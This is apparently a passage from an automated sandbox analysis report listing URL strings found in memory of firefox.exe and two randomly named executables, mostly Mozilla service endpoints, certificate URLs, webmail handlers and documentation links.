Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 00000018.00000002.2632654052.00000238F441F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2632654052.00000238F4437000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2632654052.00000238F4413000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2837667745.00000286321A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3333979888.0000028631C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2834188693.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2841500368.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833700774.000002863204C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833949224.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3308305890.000002862E965000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E8E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000023.00000002.3306154976.000002862E8E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ethiopic.org/Collation/OrderedLists.html.
Source: firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modul
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000023.00000002.3308305890.000002862E9B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630C75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316150456.0000028630BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3326407807.00000286315A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000023.00000003.2843731239.0000028630C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul%
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul);
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3846000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Global
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xultoolbar-context-menu-bookmarks-show-oth
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779246693.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000018.00000003.2609028189.00000238F712E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608033351.00000238F6F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2612170664.00000238F7144000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2639277438.00000238F715B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3326407807.0000028631538000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgcreateContentPrincipalFromOriginchrome://browser/skin/menu.svgdevice-conne
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgl
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etpexecuteIDB/promise
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000023.00000002.3317049922.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180D
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1403293
Source: firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1592344
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
